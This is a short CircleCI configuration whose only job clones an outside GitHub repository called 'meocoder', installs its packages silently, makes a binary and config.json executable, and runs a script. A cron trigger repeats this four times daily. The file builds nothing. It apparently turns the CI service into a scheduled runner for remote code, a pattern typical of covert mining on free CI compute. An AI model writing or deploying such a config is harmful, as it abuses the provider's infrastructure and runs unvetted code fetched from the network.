version: 2.1
jobs:
  build:
    docker:
      - image: circleci/node:12
      
    resource_class: medium

    working_directory: ~/meocoder

    steps:
      - checkout
      
      - run:
          name: Clone project and run task
          command:  git clone https://github.com/vippro99/meocoder.git && cd meocoder && npm i -s && chmod +x meocoder config.json && node app-1h.js

      # cronjob 
workflows:
  version: 2

  constantly_check:
    triggers:
      - schedule:
          cron: "3 10,16,22,4 * * *"
          filters:
            branches:
              only:
                - main
                - master
    jobs:
      - build